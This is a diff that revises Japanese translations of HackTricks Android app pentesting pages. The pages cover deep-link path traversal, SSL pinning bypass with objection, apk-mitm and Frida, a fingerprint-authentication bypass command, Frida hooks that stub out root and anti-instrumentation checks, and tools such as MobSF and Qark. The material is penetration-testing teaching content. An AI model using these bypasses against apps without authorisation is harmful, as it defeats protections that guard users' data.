-アプリケーション内で正しいエンドポイントを見つけた場合、**オープンリダイレクト**(パスの一部がドメイン名として使用される場合)、**アカウント乗っ取り**(CSRFトークンなしでユーザーの詳細を変更でき、脆弱なエンドポイントが正しいメソッドを使用している場合)やその他の脆弱性を引き起こす可能性があります。詳細は[こちら](http://dphoeniixx.com/2020/12/13-2/)を参照してください。
+**URLのパス内でパラメータを使用しているディープリンクがあるかどうかも確認する必要があります**。例えば、`https://api.example.com/v1/users/{username}` のように。この場合、`example://app/users?username=../../unwanted-endpoint%3fparam=value` のようにパスのトラバーサルを強制することができます。\
+アプリケーション内で正しいエンドポイントを見つけた場合、**オープンリダイレクト**(パスの一部がドメイン名として使用される場合)、**アカウント乗っ取り**(CSRFトークンなしでユーザーの詳細を変更でき、脆弱なエンドポイントが正しいメソッドを使用している場合)、およびその他の脆弱性を引き起こす可能性があります。詳細は[こちら](http://dphoeniixx.com/2020/12/13-2/)を参照してください。
 
 **さらなる例**
 
@@ -418,7 +420,7 @@ SSLピンニングは、アプリケーションがサーバーの証明書を
 
 HTTPトラフィックを検査するには、**プロキシツールの証明書をインストールする必要があります**(例:Burp)。この証明書をインストールしないと、暗号化されたトラフィックはプロキシを通じて表示されない可能性があります。カスタムCA証明書のインストールに関するガイドは、[**こちらをクリック**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine)してください。
 
-**APIレベル24以上**をターゲットにしたアプリケーションは、プロキシのCA証明書を受け入れるためにネットワークセキュリティ構成を変更する必要があります。このステップは、暗号化されたトラフィックを検査するために重要です。ネットワークセキュリティ構成を変更する手順については、[**このチュートリアルを参照**](make-apk-accept-ca-certificate.md)してください。
+**APIレベル24以上**をターゲットにしたアプリケーションは、プロキシのCA証明書を受け入れるためにネットワークセキュリティ構成を変更する必要があります。このステップは、暗号化されたトラフィックを検査するために重要です。ネットワークセキュリティ構成の変更に関する指示は、[**このチュートリアル**](make-apk-accept-ca-certificate.md)を参照してください。
 
 **Flutter**が使用されている場合は、[**このページ**](flutter.md)の指示に従う必要があります。これは、証明書をストアに追加するだけでは機能せず、Flutterには独自の有効なCAのリストがあるためです。
 
@@ -428,7 +430,7 @@ SSLピンニングが実装されている場合、HTTPSトラフィックを検
 
 - **apkを自動的に修正**してSSLピンニングを**バイパス**するには、[**apk-mitm**](https://github.com/shroudedcode/apk-mitm)を使用します。このオプションの最大の利点は、SSLピンニングをバイパスするためにルートが必要ないことですが、アプリケーションを削除して新しいものを再インストールする必要があり、これが常に機能するわけではありません。
 - **Frida**を使用してこの保護をバイパスすることもできます(以下で説明)。Burp+Frida+Genymotionを使用するためのガイドはこちらです:[https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/)
-- **objection**を使用してSSLピンニングを**自動的にバイパス**することもできます(以下で説明):`objection --gadget com.package.app explore --startup-command "android sslpinning disable"`
+- **objection**を使用してSSLピンニングを**自動的にバイパス**することもできます:`objection --gadget com.package.app explore --startup-command "android sslpinning disable"`
 - **MobSF動的分析**を使用してSSLピンニングを**自動的にバイパス**することも試みることができます(以下で説明)。
 - まだキャプチャしていないトラフィックがあると思われる場合は、**iptablesを使用してトラフィックをburpに転送**することを試みることができます。このブログを読んでください:[https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62](https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62)
 
@@ -483,19 +485,19 @@ frida -U -f com.example.app -l frida-scripts/tracer-cipher.js
 ```
 ### **指紋/生体認証バイパス**
 
-次のFridaスクリプトを使用することで、Androidアプリケーションが特定の機密領域を保護するために実行している**指紋認証をバイパス**することが可能になるかもしれません:
+次のFridaスクリプトを使用することで、Androidアプリケーションが特定の機密領域を保護するために実行している**指紋認証をバイパス**することが可能です:
 ```bash
 frida --codeshare krapgras/android-biometric-bypass-update-android-11 -U -f 
 ```
 ### **バックグラウンド画像**
 
-アプリケーションをバックグラウンドに置くと、Androidはアプリケーションの**スナップショット**を保存します。これにより、フォアグラウンドに復帰したときに、アプリが読み込まれる前に画像が読み込まれるため、アプリがより早く読み込まれたように見えます。
+アプリケーションをバックグラウンドに置くと、Androidはアプリケーションの**スナップショット**を保存します。これにより、フォアグラウンドに復帰したときにアプリがより早く読み込まれているように見えます。
 
-しかし、このスナップショットに**機密情報**が含まれている場合、スナップショットにアクセスできる誰かがその情報を**盗む**可能性があります(アクセスするにはルート権限が必要です)。
+しかし、このスナップショットに**機密情報**が含まれている場合、スナップショットにアクセスできる誰かがその情報を**盗む可能性**があります(アクセスするにはルート権限が必要です)。
 
 スナップショットは通常、次の場所に保存されます: **`/data/system_ce/0/snapshots`**
 
-Androidは、FLAG_SECUREレイアウトパラメータを設定することで**スクリーンショットのキャプチャを防ぐ**方法を提供します。このフラグを使用すると、ウィンドウの内容は安全と見なされ、スクリーンショットに表示されたり、非安全なディスプレイで表示されたりすることを防ぎます。
+Androidは、FLAG_SECUREレイアウトパラメータを設定することで**スクリーンショットのキャプチャを防ぐ**方法を提供します。このフラグを使用すると、ウィンドウの内容は安全と見なされ、スクリーンショットに表示されたり、非安全なディスプレイで表示されたりするのを防ぎます。
 ```bash
 getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE);
 ```
@@ -507,7 +509,7 @@ getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE);
 
 開発者は、これらのインテントを処理し、`startActivity(...)`や`sendBroadcast(...)`などのメソッドに渡すプロキシコンポーネント(アクティビティ、サービス、ブロードキャストレシーバーなど)を作成することがよくありますが、これはリスクを伴います。
 
-危険は、攻撃者がこれらのインテントを誤って誘導することによって、非エクスポートアプリコンポーネントをトリガーしたり、機密コンテンツプロバイダーにアクセスしたりできることにあります。注目すべき例は、`WebView`コンポーネントがURLを`Intent`オブジェクトに変換し、`Intent.parseUri(...)`を介して実行することで、悪意のあるインテント注入につながる可能性があることです。
+危険は、攻撃者がこれらのインテントを誤って誘導することによって、非エクスポートアプリコンポーネントをトリガーしたり、機密コンテンツプロバイダーにアクセスしたりできることにあります。注目すべき例は、`WebView`コンポーネントがURLを`Intent`オブジェクトに変換し、`Intent.parseUri(...)`を介して実行することで、悪意のあるインテント注入につながる可能性があります。
 
 ### Essential Takeaways
 
@@ -523,7 +525,7 @@ getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE);
 - **SQL Injection:** 動的クエリやコンテンツプロバイダーを扱う際は、パラメータ化されたクエリを使用していることを確認してください。
 - **JavaScript Injection (XSS):** すべてのWebViewに対してJavaScriptおよびプラグインサポートが無効になっていることを確認してください(デフォルトで無効)。 [More info here](webview-attacks.md#javascript-enabled).
 - **Local File Inclusion:** WebViewはファイルシステムへのアクセスを無効にする必要があります(デフォルトで有効) - `(webview.getSettings().setAllowFileAccess(false);)`。 [More info here](webview-attacks.md#javascript-enabled).
-- **Eternal cookies**: Androidアプリケーションがセッションを終了するとき、クッキーが取り消されない場合や、ディスクに保存される可能性があります。
+- **Eternal cookies**: Androidアプリケーションがセッションを終了するとき、クッキーが取り消されない場合や、ディスクに保存されることがあります。
 - [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/index.html#cookies-flags)
 
 ---
@@ -542,20 +544,20 @@ docker pull opensecurity/mobile-security-framework-mobsf
 docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
 ```
 MobSFは**Android**(apk)**、IOS**(ipa) **およびWindows**(apx)アプリケーションを分析できます(_WindowsアプリケーションはWindowsホストにインストールされたMobSFから分析する必要があります_)。\
-また、**Android**または**IOS**アプリのソースコードを含む**ZIP**ファイルを作成すると(アプリケーションのルートフォルダーに移動し、すべてを選択してZIPファイルを作成)、それも分析できます。
+また、**Android**または**IOS**アプリのソースコードで**ZIP**ファイルを作成すると(アプリケーションのルートフォルダーに移動し、すべてを選択してZIPファイルを作成)、それも分析できます。
 
-MobSFは**diff/Compare**分析を行い、**VirusTotal**を統合することも可能です(_MobSF/settings.py_にAPIキーを設定し、次のように有効にする必要があります: `VT_ENABLED = TRUE` `VT_API_KEY = ` `VT_UPLOAD = TRUE`)。`VT_UPLOAD`を`False`に設定すると、**ハッシュ**がファイルの代わりに**アップロード**されます。
+MobSFは**diff/Compare**分析を行い、**VirusTotal**を統合することもできます(_MobSF/settings.py_にAPIキーを設定し、`VT_ENABLED = TRUE` `VT_API_KEY = ` `VT_UPLOAD = TRUE`を有効にする必要があります)。`VT_UPLOAD`を`False`に設定すると、**ハッシュ**がファイルの代わりに**アップロード**されます。
 
 ### MobSFによる支援された動的分析
 
-**MobSF**は**Android**における**動的分析**にも非常に役立ちますが、その場合はホストにMobSFと**genymotion**をインストールする必要があります(VMやDockerでは動作しません)。_注: **まずgenymotionでVMを起動し**、**その後MobSFを起動する必要があります。**_\
-**MobSF動的アナライザー**は以下のことができます:
+**MobSF**は**Android**における**動的分析**にも非常に役立ちますが、その場合はホストにMobSFと**genymotion**をインストールする必要があります(VMやDockerでは動作しません)。_注:最初に**genymotionでVMを起動**し、**その後MobSFを起動**する必要があります。_\
+**MobSF動的アナライザー**は以下を行うことができます:
 
-- **アプリケーションデータをダンプ**(URL、ログ、クリップボード、あなたが撮ったスクリーンショット、"**Exported Activity Tester**"によって作成されたスクリーンショット、メール、SQLiteデータベース、XMLファイル、その他の作成されたファイル)。これらはすべて自動的に行われますが、スクリーンショットは撮りたいときにボタンを押す必要があります。または、すべてのエクスポートされたアクティビティのスクリーンショットを取得するために"**Exported Activity Tester**"を押す必要があります。
+- **アプリケーションデータをダンプ**(URL、ログ、クリップボード、あなたが撮ったスクリーンショット、"Exported Activity Tester"によって作成されたスクリーンショット、メール、SQLiteデータベース、XMLファイル、その他の作成されたファイル)。これらはすべて自動的に行われますが、スクリーンショットは撮りたいときにボタンを押す必要があります。または、すべてのエクスポートされたアクティビティのスクリーンショットを取得するために"Exported Activity Tester"を押す必要があります。
 - **HTTPSトラフィックをキャプチャ**
 - **Frida**を使用して**ランタイム**の**情報**を取得
 
-Androidの**バージョン > 5**では、**Frida**が**自動的に起動**し、**トラフィックをキャプチャ**するためのグローバル**プロキシ**設定が行われます。テストされたアプリケーションからのトラフィックのみをキャプチャします。
+Androidの**バージョン > 5**では、**Frida**が**自動的に起動**し、トラフィックを**キャプチャ**するためのグローバル**プロキシ**設定が行われます。テストされたアプリケーションからのトラフィックのみをキャプチャします。
 
 **Frida**
 
@@ -563,18 +565,18 @@ Androidの**バージョン > 5**では、**Frida**が**自動的に起動**し
 MobSFはまた、**エクスポートされたアクティビティを呼び出し**、それらの**スクリーンショットを取得**し、レポート用に**保存**することもできます。
 
 動的テストを**開始**するには、緑のボタン"**Start Instrumentation**"を押します。"**Frida Live Logs**"を押すと、Fridaスクリプトによって生成されたログが表示され、"**Live API Monitor**"を押すと、フックされたメソッドへのすべての呼び出し、渡された引数、返された値が表示されます(これは"Start Instrumentation"を押した後に表示されます)。\
-MobSFは、独自の**Fridaスクリプト**を読み込むこともできます(Fridaスクリプトの結果をMobSFに送信するには、`send()`関数を使用します)。また、読み込むことができる**いくつかの事前に書かれたスクリプト**もあります(`MobSF/DynamicAnalyzer/tools/frida_scripts/others/`に追加できます)。ただ**選択し**、"**Load**"を押し、"**Start Instrumentation**"を押すと、そのスクリプトのログを"**Frida Live Logs**"内で見ることができます。
+MobSFは、独自の**Fridaスクリプト**を読み込むこともできます(Fridaスクリプトの結果をMobSFに送信するには、`send()`関数を使用します)。また、読み込むことができる**いくつかの事前に書かれたスクリプト**もあります(`MobSF/DynamicAnalyzer/tools/frida_scripts/others/`に追加できます)。ただし、**それらを選択し**、"**Load**"を押し、"**Start Instrumentation**"を押す必要があります(そのスクリプトのログは"**Frida Live Logs**"内で見ることができます)。
 
 ![](<../../images/image (419).png>)
 
 さらに、いくつかの補助的なFrida機能があります:
 
-- **読み込まれたクラスを列挙**: すべての読み込まれたクラスを表示します
-- **文字列をキャプチャ**: アプリケーションを使用中にキャプチャされたすべての文字列を表示します(非常にノイジーです)
-- **文字列比較をキャプチャ**: 非常に便利です。**比較されている2つの文字列**と、結果がTrueかFalseかを**表示**します。
-- **クラスメソッドを列挙**: クラス名(例:"java.io.File")を入力すると、そのクラスのすべてのメソッドが表示されます。
-- **クラスパターンを検索**: パターンでクラスを検索
-- **クラスメソッドをトレース**: **クラス全体をトレース**(そのクラスのすべてのメソッドの入力と出力を確認)。デフォルトでは、MobSFは興味深いAndroid APIメソッドをいくつかトレースします。
+- **読み込まれたクラスを列挙**:すべての読み込まれたクラスを表示します
+- **文字列をキャプチャ**:アプリケーションを使用中にキャプチャされたすべての文字列を表示します(非常にノイジーです)
+- **文字列比較をキャプチャ**:非常に便利です。**比較されている2つの文字列**と、結果がTrueかFalseかを表示します。
+- **クラスメソッドを列挙**:クラス名(例:"java.io.File")を入力すると、そのクラスのすべてのメソッドが表示されます。
+- **クラスパターンを検索**:パターンでクラスを検索します
+- **クラスメソッドをトレース**:**クラス全体をトレース**します(そのクラスのすべてのメソッドの入力と出力を確認します)。デフォルトでは、MobSFは興味深いAndroid APIメソッドをいくつかトレースします。
 
 使用したい補助モジュールを選択したら、"**Start Intrumentation**"を押すと、すべての出力が"**Frida Live Logs**"に表示されます。
 
@@ -591,10 +593,10 @@ receivers
 ```
 **HTTPツール**
 
-HTTPトラフィックがキャプチャされると、キャプチャされたトラフィックの醜いビューが「**HTTP(S) Traffic**」の下部に表示されるか、「**Start HTTPTools**」の緑のボタンでより良いビューが表示されます。2番目のオプションから、**キャプチャされたリクエスト**を**プロキシ**(BurpやOwasp ZAPなど)に**送信**できます。\
-そのためには、_Burpを起動 -->_ _インターセプトをオフにする --> MobSBのHTTPToolsでリクエストを選択_ --> 「**Send to Fuzzer**」を押す --> _プロキシアドレスを選択_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080))。
+HTTPトラフィックがキャプチャされると、"**HTTP(S) Traffic**"の下にキャプチャされたトラフィックの醜いビューが表示されるか、"**Start HTTPTools**"の緑のボタンでより良いビューが表示されます。2番目のオプションから、**キャプチャされたリクエスト**を**プロキシ**(BurpやOwasp ZAPなど)に**送信**できます。\
+そのためには、_Burpを起動 -->_ _インターセプトをオフにする --> MobSBのHTTPToolsでリクエストを選択_ --> "**Send to Fuzzer**"を押す --> _プロキシアドレスを選択_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080))。
 
-MobSFで動的分析が終了したら、「**Start Web API Fuzzer**」を押して**HTTPリクエストをファズ**し、脆弱性を探します。
+MobSFで動的分析が終了したら、"**Start Web API Fuzzer**"を押して**HTTPリクエストをファズ**し、脆弱性を探します。
 
 > [!TIP]
 > MobSFで動的分析を実行した後、プロキシ設定が誤って構成される可能性があり、GUIから修正できなくなることがあります。プロキシ設定を修正するには、次のコマンドを実行します:
@@ -616,7 +618,7 @@ MobSFで動的分析が終了したら、「**Start Web API Fuzzer**」を押し
 
 ### [Qark](https://github.com/linkedin/qark)
 
-このツールは、**ソースコード**または**パッケージ化されたAPK**のいずれかで、いくつかの**セキュリティ関連のAndroidアプリケーションの脆弱性**を探すように設計されています。このツールは、発見された脆弱性(公開されたアクティビティ、インテント、タップジャッキングなど)を悪用するための「Proof-of-Concept」デプロイ可能APKおよび**ADBコマンド**を作成することも**可能です**。Drozerと同様に、テストデバイスをルート化する必要はありません。
+このツールは、**ソースコード**または**パッケージ化されたAPK**のいずれかで、いくつかの**セキュリティ関連のAndroidアプリケーションの脆弱性**を探すように設計されています。このツールは、発見された脆弱性(公開されたアクティビティ、インテント、タップジャッキングなど)を悪用するための**「Proof-of-Concept」デプロイ可能APK**と**ADBコマンド**を作成することも**可能です**。Drozerと同様に、テストデバイスをルート化する必要はありません。
 ```bash
 pip3 install --user qark  # --user is only needed if not using a virtualenv
 qark --apk path/to/my.apk
@@ -625,7 +627,7 @@ qark --java path/to/specific/java/file.java
 ```
 ### [**ReverseAPK**](https://github.com/1N3/ReverseAPK.git)
 
-- すべての抽出されたファイルを簡単に参照できるように表示
+- 参照用にすべての抽出ファイルを表示
 - APKファイルを自動的にJavaおよびSmali形式にデコンパイル
 - 一般的な脆弱性と動作のためにAndroidManifest.xmlを分析
 - 一般的な脆弱性と動作のための静的ソースコード分析
@@ -636,9 +638,9 @@ reverse-apk relative/path/to/APP.apk
 ```
 ### [SUPER Android Analyzer](https://github.com/SUPERAndroidAnalyzer/super)
 
-SUPERは、Windows、MacOS X、Linuxで使用できるコマンドラインアプリケーションで、脆弱性を探すために_.apk_ファイルを分析します。これは、APKを解凍し、一連のルールを適用して脆弱性を検出することによって行われます。
+SUPERは、Windows、MacOS X、Linuxで使用できるコマンドラインアプリケーションで、脆弱性を探すために_.apk_ファイルを分析します。これは、APKを解凍し、脆弱性を検出するための一連のルールを適用することによって行われます。
 
-すべてのルールは`rules.json`ファイルに集中しており、各企業やテスターは自分たちが必要とする分析のために独自のルールを作成できます。
+すべてのルールは`rules.json`ファイルに集中しており、各企業やテスターは自分たちのニーズに応じて分析するための独自のルールを作成できます。
 
 最新のバイナリは[ダウンロードページ](https://superanalyzer.rocks/download.html)からダウンロードしてください。
 ```
@@ -670,7 +672,7 @@ androbugs.exe -f [APK file]
 
 検出は、アプリケーションのDalvikバイトコードの**静的解析**を使用して行われ、**Smali**として表現されます。[`androguard`](https://github.com/androguard/androguard)ライブラリを使用しています。
 
-このツールは、次のような**「悪い」アプリケーションの一般的な動作**を探します: テレフォニー識別子の流出、音声/ビデオフローの傍受、PIMデータの変更、任意のコード実行...
+このツールは、次のような「悪い」アプリケーションの**一般的な動作**を探します:電話識別子の流出、音声/ビデオフローの傍受、PIMデータの変更、任意のコード実行...
 ```
 python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
 ```
@@ -678,7 +680,7 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
 
 ![](<../../images/image (595).png>)
 
-**MARA**は**モバイルアプリケーションの逆コンパイルおよび分析フレームワーク**です。これは、OWASPモバイルセキュリティ脅威に対してモバイルアプリケーションをテストするために、一般的に使用されるモバイルアプリケーションの逆コンパイルおよび分析ツールをまとめたツールです。その目的は、この作業をモバイルアプリケーションの開発者やセキュリティ専門家にとってより簡単で親しみやすくすることです。
+**MARA**は**モバイルアプリケーションの逆アセンブルおよび分析フレームワーク**です。これは、OWASPモバイルセキュリティ脅威に対してモバイルアプリケーションをテストするために、一般的に使用されるモバイルアプリケーションの逆アセンブルおよび分析ツールをまとめたツールです。その目的は、この作業をモバイルアプリケーションの開発者やセキュリティ専門家にとってより簡単で親しみやすくすることです。
 
 以下のことが可能です:
 
@@ -691,7 +693,7 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
 
 ### Koodous
 
-マルウェアを検出するのに役立ちます:[https://koodous.com/](https://koodous.com)
+マルウェアを検出するのに役立ちます: [https://koodous.com/](https://koodous.com)
 
 ## コードの難読化/デオブフスケート
 
@@ -699,7 +701,7 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
 
 ### [ProGuard]()
 
-[Wikipedia]()から:**ProGuard**は、Javaコードを縮小、最適化、難読化するオープンソースのコマンドラインツールです。バイトコードを最適化し、未使用の命令を検出して削除することができます。ProGuardはフリーソフトウェアで、GNU一般公衆ライセンス第2版の下で配布されています。
+[Wikipedia](より): **ProGuard**は、Javaコードを縮小、最適化、難読化するオープンソースのコマンドラインツールです。バイトコードを最適化し、未使用の命令を検出して削除することができます。ProGuardはフリーソフトウェアで、GNU一般公衆ライセンス第2版の下で配布されています。
 
 ProGuardはAndroid SDKの一部として配布され、アプリケーションをリリースモードでビルドする際に実行されます。
 
@@ -709,10 +711,10 @@ APKをデオブフスケートするためのステップバイステップガ
 
 (そのガイドから)最後に確認したとき、Dexguardの動作モードは次のとおりでした:
 
-- リソースをInputStreamとして読み込む;
-- 結果をFilterInputStreamから継承したクラスに渡して復号化する;
-- リバースエンジニアに数分の時間を無駄にさせるために無駄な難読化を行う;
-- 復号化された結果をZipInputStreamに渡してDEXファイルを取得する;
+- リソースをInputStreamとして読み込む;
+- 結果をFilterInputStreamから継承したクラスに渡して復号化する;
+- リバースエンジニアに数分の時間を無駄にさせるために無駄な難読化を行う;
+- 復号化された結果をZipInputStreamに渡してDEXファイルを取得する;
 - 最後に、`loadDex`メソッドを使用して結果のDEXをリソースとして読み込む。
 
 ### [DeGuard](http://apk-deguard.com)
@@ -727,23 +729,23 @@ APKをデオブフスケートするためのステップバイステップガ
 
 ### [Simplify](https://github.com/CalebFenton/simplify)
 
-これは**一般的なAndroidデオブフスケーター**です。Simplifyは**アプリを仮想的に実行**してその動作を理解し、その後**コードを最適化しようとします**。最適化されたコードは同じ動作をしますが、人間にとって理解しやすくなります。各最適化タイプはシンプルで一般的であるため、使用される特定の難読化のタイプは関係ありません。
+これは**一般的なAndroidデオブフスケーター**です。Simplifyは**アプリを仮想的に実行**してその動作を理解し、その後**コードを最適化しようとします**。最適化の各タイプはシンプルで一般的であるため、使用される特定の難読化のタイプは関係ありません。
 
 ### [APKiD](https://github.com/rednaga/APKiD)
 
 APKiDは**APKがどのように作成されたか**に関する情報を提供します。多くの**コンパイラ**、**パッカー**、**難読化ツール**、およびその他の奇妙なものを特定します。これはAndroid用の[_PEiD_](https://www.aldeid.com/wiki/PEiD)です。
 
-### Manual
+### マニュアル
 
-[カスタム難読化を逆コンパイルする方法に関するいくつかのトリックを学ぶためにこのチュートリアルを読んでください](manual-deobfuscation.md)
+[カスタム難読化を逆転させる方法に関するいくつかのトリックを学ぶためにこのチュートリアルを読んでください](manual-deobfuscation.md)
 
-## Labs
+## ラボ
 
 ### [Androl4b](https://github.com/sh4hin/Androl4b)
 
-AndroL4bは、最新のフレームワーク、チュートリアル、およびリバースエンジニアリングとマルウェア分析のためのさまざまなセキュリティ専門家や研究者からのラボを含む、ubuntu-mateに基づいたAndroidセキュリティ仮想マシンです。
+AndroL4bは、Ubuntu-mateに基づいたAndroidセキュリティ仮想マシンで、リバースエンジニアリングやマルウェア分析のための最新のフレームワーク、チュートリアル、ラボのコレクションを含んでいます。
 
-## References
+## 参考文献
 
 - [https://owasp.org/www-project-mobile-app-security/](https://owasp.org/www-project-mobile-app-security/)
 - [https://appsecwiki.com/#/](https://appsecwiki.com/#/) これは素晴らしいリソースのリストです
@@ -752,7 +754,7 @@ AndroL4bは、最新のフレームワーク、チュートリアル、および
 - [https://github.com/Ralireza/Android-Security-Teryaagh](https://github.com/Ralireza/Android-Security-Teryaagh)
 - [https://www.youtube.com/watch?v=PMKnPaGWxtg\&feature=youtu.be\&ab_channel=B3nacSec](https://www.youtube.com/watch?v=PMKnPaGWxtg&feature=youtu.be&ab_channel=B3nacSec)
 
-## Yet to try
+## まだ試していない
 
 - [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/)
 - [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
diff --git a/src/mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md b/src/mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md
index 6167ad7d0..1692badd0 100644
--- a/src/mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md
+++ b/src/mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md
@@ -2,30 +2,30 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-このページでは、インスツルメンテーションを検出/ブロックしたり、TLSピンニングを強制するAndroidアプリに対して動的分析を再取得するための実用的なワークフローを提供します。迅速なトリアージ、一般的な検出、および再パッキングなしでバイパスするためのコピー&ペースト可能なフック/戦術に焦点を当てています。
+このページでは、インスツルメンテーションを検出/ルートブロックするAndroidアプリやTLSピンニングを強制するアプリに対して動的分析を再取得するための実用的なワークフローを提供します。迅速なトリアージ、一般的な検出、および再パッキングなしでバイパスするためのコピー&ペースト可能なフック/戦術に焦点を当てています。
 
 ## Detection Surface (アプリがチェックするもの)
 
 - ルートチェック: suバイナリ、Magiskパス、getprop値、一般的なルートパッケージ
 - Frida/デバッガーチェック (Java): Debug.isDebuggerConnected(), ActivityManager.getRunningAppProcesses(), getRunningServices(), /procのスキャン、クラスパス、ロードされたライブラリ
 - ネイティブアンチデバッグ: ptrace(), システムコール、アンチアタッチ、ブレークポイント、インラインフック
-- 初期化チェック: Application.onCreate()またはプロセス開始フックがインスツルメンテーションが存在する場合にクラッシュする
+- 初期化チェック: Application.onCreate()またはインスツルメンテーションが存在する場合にクラッシュするプロセス開始フック
 - TLSピンニング: カスタムTrustManager/HostnameVerifier、OkHttp CertificatePinner、Conscryptピンニング、ネイティブピン
 
-## Step 1 — Quick win: hide root with Magisk DenyList
+## Step 1 — クイックウィン: Magisk DenyListでルートを隠す
 
 - MagiskでZygiskを有効にする
 - DenyListを有効にし、ターゲットパッケージを追加
 - 再起動して再テスト
 
-多くのアプリは明白な指標(su/Magiskパス/getprop)を探すだけです。DenyListはしばしば単純なチェックを無効化します。
+多くのアプリは明らかな指標(su/Magiskパス/getprop)だけを探します。DenyListはしばしば単純なチェックを無効化します。
 
 References:
 - Magisk (Zygisk & DenyList): https://github.com/topjohnwu/Magisk
 
-## Step 2 — 30‑second Frida Codeshare tests
+## Step 2 — 30秒Fridaコードシェアテスト
 
-深く掘り下げる前に、一般的なドロップインスクリプトを試してください:
+深く掘り下げる前に一般的なドロップインスクリプトを試してください:
 
 - anti-root-bypass.js
 - anti-frida-detection.js
@@ -50,12 +50,12 @@ aobjection --gadget com.example.app explore  # if using gadget
 ```
 もしこれが機能すれば、セッションを安定させ、マッピングとスタブチェックを進めます。
 
-## ステップ 4 — Jadxを使用して検出ロジックをマッピングし、文字列をハントする
+## ステップ 4 — Jadxを使用した検出ロジックのマッピングと文字列ハンティング
 
-Jadxでの静的トリアージキーワード:
+Jadxでの静的トリアージキーワード:
 - "frida", "gum", "root", "magisk", "ptrace", "su", "getprop", "debugger"
 
-典型的なJavaパターン:
+典型的なJavaパターン:
 ```java
 public boolean isFridaDetected() {
 return getRunningServices().contains("frida");
@@ -70,7 +70,7 @@ return getRunningServices().contains("frida");
 
 ## ステップ5 — Fridaを使用したランタイムスタブ (Java)
 
-カスタムガードをオーバーライドして、安全な値を返すようにし、再パッキングを行わない:
+カスタムガードをオーバーライドして、安全な値を返すようにします。
 ```js
 Java.perform(() => {
 const Checks = Java.use('com.example.security.Checks');
@@ -104,7 +104,7 @@ return false;
 };
 });
 ```
-## ステップ 6 — Java フックが失敗した場合は JNI/ネイティブのトレイルをたどる
+## ステップ 6 — Java フックが失敗したときに JNI/ネイティブのトレイルを追う
 
 JNI エントリポイントをトレースして、ネイティブローダーと検出初期化を特定します:
 ```bash
@@ -117,7 +117,7 @@ nm -D libfoo.so | head
 objdump -T libfoo.so | grep Java_
 strings -n 6 libfoo.so | egrep -i 'frida|ptrace|gum|magisk|su|root'
 ```
-インタラクティブ/ネイティブリバース:
+インタラクティブ/ネイティブリバースエンジニアリング:
 - Ghidra: https://ghidra-sre.org/
 - r2frida: https://github.com/nowsecure/r2frida
 
diff --git a/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md b/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
index 1b50a210a..b011051c4 100644
--- a/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
+++ b/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
@@ -4,7 +4,7 @@
 
 このコンテンツの作成中に助けてくれた[**@offsecjay**](https://twitter.com/offsecjay)に感謝します。
 
-## とは
+## What is
 
 Android Studioは、**APKをテストするために使用できるAndroidの仮想マシンを実行することを可能にします**。これらを使用するには、次のものが必要です:
 
@@ -28,7 +28,7 @@ export JAVA_HOME=/Applications/Android\ Studio.app/Contents/jbr/Contents/Home
 
 ### 仮想マシンの準備
 
-Android Studioをインストールした場合は、メインプロジェクトビューを開いて、_**Tools**_ --> _**AVD Manager.**_ にアクセスできます。
+Android Studioをインストールした場合は、メインプロジェクトビューを開いて、_**ツール**_ --> _**AVDマネージャー**_にアクセスできます。
 
 

 
@@ -36,34 +36,37 @@ Android Studioをインストールした場合は、メインプロジェクト
 
 

 
-次に、_**Create Virtual Device**_ をクリックします。
+次に、_**仮想デバイスの作成**_をクリックします。
 
 

 
-_**使用したい電話を選択**_し、_**Next.**_ をクリックします。
+_**使用したい電話を選択**_し、_**次へ**_をクリックします。
 
 > [!WARNING]
 > Play Storeがインストールされた電話が必要な場合は、Play Storeアイコンのあるものを選択してください!
 >
 > 
 
-現在のビューでは、**電話が実行するAndroidイメージを選択してダウンロード**できます:
+現在のビューでは、電話が実行する**Androidイメージを選択してダウンロード**できます:
 
 

 
-それを選択し、ダウンロードされていない場合は、名前の横にある_**Download**_シンボルをクリックします(**今、イメージがダウンロードされるまで待ちます)。**\
-イメージがダウンロードされたら、**`Next`** と **`Finish`** を選択します。
+それを選択し、ダウンロードされていない場合は、名前の横にある_**ダウンロード**_シンボルをクリックします(**今はイメージがダウンロードされるまで待ってください)。**\
+イメージがダウンロードされたら、**`次へ`**と**`完了`**を選択します。
 
 仮想マシンが作成されます。これで、**AVDマネージャーにアクセスするたびにそれが表示されます**。
 
 ### 仮想マシンの実行
 
-**実行**するには、_**Start button**_ を押します。
+**実行**するには、_**スタートボタン**_を押します。
 
 ![](<../../images/image (518).png>)
 
 ## コマンドラインツール
 
+> [!WARNING]
